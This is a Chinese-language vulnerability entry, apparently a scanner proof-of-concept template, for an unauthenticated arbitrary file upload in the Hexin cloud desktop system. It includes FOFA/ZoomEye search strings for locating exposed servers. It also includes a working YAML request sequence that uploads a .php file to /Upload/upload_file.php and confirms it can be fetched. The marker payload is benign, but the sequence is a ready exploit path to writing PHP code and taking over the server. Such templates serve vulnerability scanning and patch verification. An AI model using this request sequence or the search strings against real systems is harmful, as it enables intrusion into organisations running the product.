漏洞描述
和信创天下一代云桌面系统融合了VDI、VOI、IDV三大架构优势的云桌面产品,实现了前后端混合计算,兼顾移动办公和窄带环境下3D高清播放和外设硬件全兼容,满足大规模终端的管理、安全、运维需求。2021HW期间,爆出和信创天下一代云桌面爆出文件上传漏洞,攻击者可利用该漏洞写入php恶意代码,从而控制服务器。
body="和信下一代云桌面"
zoomEy:title:和信下一代云桌面
vesystem-upload-file: 和信云桌面未授权任意文件上传
PoC代码[已公开]
id: vesystem-upload-file
info:
name: 和信云桌面未授权任意文件上传
severity: critical
author: 数星星
verified: true
description: |
和信创天下一代云桌面系统融合了VDI、VOI、IDV三大架构优势的云桌面产品,实现了前后端混合计算,兼顾移动办公和窄带环境下3D高清播放和外设硬件全兼容,满足大规模终端的管理、安全、运维需求。2021HW期间,爆出和信创天下一代云桌面爆出文件上传漏洞,攻击者可利用该漏洞写入php恶意代码,从而控制服务器。
body="和信下一代云桌面"
zoomEy:title:和信下一代云桌面
reference:
- https://www.secpulse.com/archives/158674.html
set:
r1: randomInt(10000, 99999)
r2: randomLowercase(32)
md5str: md5(r2)
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /Upload/upload_file.php?l=test
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"file\"; filename=\"{{r1}}.php\"\r\n\
Content-Type: image/avif\r\n\
\r\n\
{{md5str}}\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: response.status == 200 && response.body.bcontains(b'_Requst:<br>')
r1:
request:
method: GET
path: /Upload/test/{{r1}}.php
expression: response.status == 200 && response.body.bcontains(bytes(md5str))
expression: r0() && r1()